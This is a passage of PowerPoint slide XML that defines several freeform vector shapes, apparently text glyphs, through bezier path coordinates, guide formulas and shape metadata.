                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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2" name="Freeform 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253EC046-016D-4D1B-90BC-269EC38D3B38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId130"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5759450" y="2540000"/>
              <a:ext cx="57150" cy="200025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 194 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 132"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 16 w 132"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 132"/>
                <a:gd name="T9" fmla="*/ 26 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 132"/>
                <a:gd name="T11" fmla="*/ 194 h 387"/>
                <a:gd name="T12" fmla="*/ 12 w 132"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 132"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 16 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132"/>
                <a:gd name="T19" fmla="*/ 194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387">
                  <a:moveTo>
                    <a:pt x="132" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="134"/>
                    <a:pt x="109" y="89"/>
                    <a:pt x="91" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="28"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="6" y="25"/>
                    <a:pt x="8" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="244"/>
                    <a:pt x="79" y="313"/>
                    <a:pt x="12" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="363"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="377"/>
                    <a:pt x="3" y="387"/>
                    <a:pt x="16" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="387"/>
                    <a:pt x="132" y="321"/>
                    <a:pt x="132" y="1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3" name="Freeform 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272012A9-FFD1-4293-A559-3CD48F3EE83F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId131"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5889625" y="2606675"/>
              <a:ext cx="31750" cy="147638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 73 w 75"/>
                <a:gd name="T1" fmla="*/ 32 h 285"/>
                <a:gd name="T2" fmla="*/ 42 w 75"/>
                <a:gd name="T3" fmla="*/ 0 h 285"/>
                <a:gd name="T4" fmla="*/ 10 w 75"/>
                <a:gd name="T5" fmla="*/ 31 h 285"/>
                <a:gd name="T6" fmla="*/ 41 w 75"/>
                <a:gd name="T7" fmla="*/ 63 h 285"/>
                <a:gd name="T8" fmla="*/ 73 w 75"/>
                <a:gd name="T9" fmla="*/ 32 h 285"/>
                <a:gd name="T10" fmla="*/ 43 w 75"/>
                <a:gd name="T11" fmla="*/ 215 h 285"/>
                <a:gd name="T12" fmla="*/ 10 w 75"/>
                <a:gd name="T13" fmla="*/ 256 h 285"/>
                <a:gd name="T14" fmla="*/ 0 w 75"/>
                <a:gd name="T15" fmla="*/ 269 h 285"/>
                <a:gd name="T16" fmla="*/ 16 w 75"/>
                <a:gd name="T17" fmla="*/ 285 h 285"/>
                <a:gd name="T18" fmla="*/ 75 w 75"/>
                <a:gd name="T19" fmla="*/ 202 h 285"/>
                <a:gd name="T20" fmla="*/ 41 w 75"/>
                <a:gd name="T21" fmla="*/ 153 h 285"/>
                <a:gd name="T22" fmla="*/ 10 w 75"/>
                <a:gd name="T23" fmla="*/ 184 h 285"/>
                <a:gd name="T24" fmla="*/ 43 w 75"/>
                <a:gd name="T25" fmla="*/ 21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85">
                  <a:moveTo>
                    <a:pt x="73" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="13"/>
                    <a:pt x="58" y="0"/>
                    <a:pt x="42" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="10" y="16"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="25" y="63"/>
                    <a:pt x="41" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="63"/>
                    <a:pt x="73" y="47"/>
                    <a:pt x="73" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="242"/>
                    <a:pt x="18" y="252"/>
                    <a:pt x="10" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="257"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="276"/>
                    <a:pt x="8" y="285"/>
                    <a:pt x="16" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="285"/>
                    <a:pt x="75" y="258"/>
                    <a:pt x="75" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="169"/>
                    <a:pt x="60" y="153"/>
                    <a:pt x="41" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="153"/>
                    <a:pt x="10" y="167"/>
                    <a:pt x="10" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="198"/>
                    <a:pt x="19" y="215"/>
                    <a:pt x="43" y="21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4" name="Freeform 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D0D460-A08C-4E03-9A1D-B80E3283B601}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId132"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5975350" y="2574925"/>
              <a:ext cx="87313" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 34 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 17 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 125 h 249"/>
                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 245 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 125 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T25" fmla="*/ 3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49">
                  <a:moveTo>
                    <a:pt x="194" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="137"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="244"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="223"/>
                    <a:pt x="199" y="219"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="3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5" name="Freeform 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40FB8218-051C-40D1-9A86-F9EDCC391E62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId133"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6086475" y="2540000"/>
              <a:ext cx="85725" cy="200025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 2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388">
                  <a:moveTo>
                    <a:pt x="199" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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6" name="Freeform 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F21DF3A-504E-4D8A-B7FE-297E4BBFAF5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId134"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6199188" y="2605088"/>
              <a:ext cx="82550" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="139"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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7" name="Freeform 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DCE7F89-0187-4578-BDC6-A3409AB51E9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId135"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6310313" y="2605088"/>
              <a:ext cx="82550" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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8" name="Freeform 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57FAE9D-4E0F-4644-B22E-896341C885F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId136"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6411913" y="2605088"/>
              <a:ext cx="96838" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
